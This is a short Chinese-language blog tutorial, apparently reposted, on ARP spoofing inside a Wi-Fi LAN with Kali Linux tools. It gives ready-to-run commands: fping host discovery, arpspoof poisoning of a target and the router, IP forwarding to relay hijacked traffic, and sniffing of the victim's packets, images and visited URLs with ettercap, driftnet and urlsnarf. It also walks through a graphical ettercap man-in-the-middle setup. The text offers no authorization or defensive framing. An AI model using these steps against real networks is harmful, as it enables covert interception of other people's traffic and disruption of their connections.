kail linux arp欺骗

首先连接wifi,进入内网

1,查看内网的存活主机  命令  fping -asg 192.168.1.0/24    (视不同环境而定,假设这里的路由器地址为 192.168.1.1)

     也可利用其他工具查看其他主机,方法有很多

2,arp欺骗  命令 arpspoof -i wlan0 -t 192.168.1.2(目标的内网地址) 192.168.1.1

上面一句就对192.168.1.2实施了欺骗 ,此时该主机是断网的

3,流量转发  我们将劫持到的流量通过自己发机器转发到受害人的机器上,让其恢复网络

转发命令  echo 1 >/proc/sys/net/ipv4/ip_forward   将参数换为1

    这时可以启用 wireshark 抓包工具进行抓包

             或者直接获取流量包  ettercap -Tq -i wlan0

    获取图片和浏览的网站driftnet -i wlan0        urlsnarf -i wlan0

-------------------------------------------------------------------------------------------------------------

另一种图形化的欺骗方式

ettercap -G  启动图形化的ettercap

先扫描内网用户,然后添加目标ip和192.168.1.1

 选择 Mitm arp sniff

完成后启动效果和上面一样

arp欺骗是渗透内网的第一步

原文地址:https://www.cnblogs.com/jjj-fly/p/7228625.html